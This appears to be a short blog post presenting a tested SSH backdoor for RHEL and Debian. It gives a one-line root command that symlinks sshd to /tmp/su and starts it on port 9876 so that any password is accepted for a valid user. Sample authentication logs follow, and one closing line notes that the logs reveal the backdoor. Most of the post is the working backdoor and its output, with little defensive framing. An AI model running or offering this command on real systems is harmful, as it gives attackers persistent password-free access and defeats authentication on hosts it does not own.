A Shell Backdoor that allows random password to login

This backdoor has been tested on RHEL-5, 6, 7 and Debian 7, both work well. This command will open a SSH port and allow random password for valid user to login.

# ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=9876

Typical authentication log on RHEL-5,

Jul 3 02:57:49 test su[17802]: Accepted password for irc from 127.0.0.1 port 51299 ssh2
Jul 3 02:57:49 test su[17802]: pam_unix(su:session): session opened for user irc by (uid=0)
Jul 3 02:57:49 test su[17802]: pam_mkhomedir(su:session): unknown option: mask=0022
Jul 3 02:57:50 test su[19237]: Received disconnect from 127.0.0.1: 11: disconnected by user
Jul 3 02:57:50 test su[17802]: pam_unix(su:session): session closed for user irc

Typical auth log on RHEL-7,

Jul 2 01:11:54 rhel7 su[41753]: Accepted password for root from ::1 port 45970 ssh2
Jul 2 01:11:54 rhel7 su[41753]: pam_unix(su:session): session opened for user root by (uid=0)
Jul 2 01:11:54 rhel7 su[41753]: error: ssh_selinux_setup_pty: security_compute_relabel: Invalid argument

This malicious behavior can be tracked by these log records.

Share Button

Leave a comment

Your email address will not be published. Required fields are marked *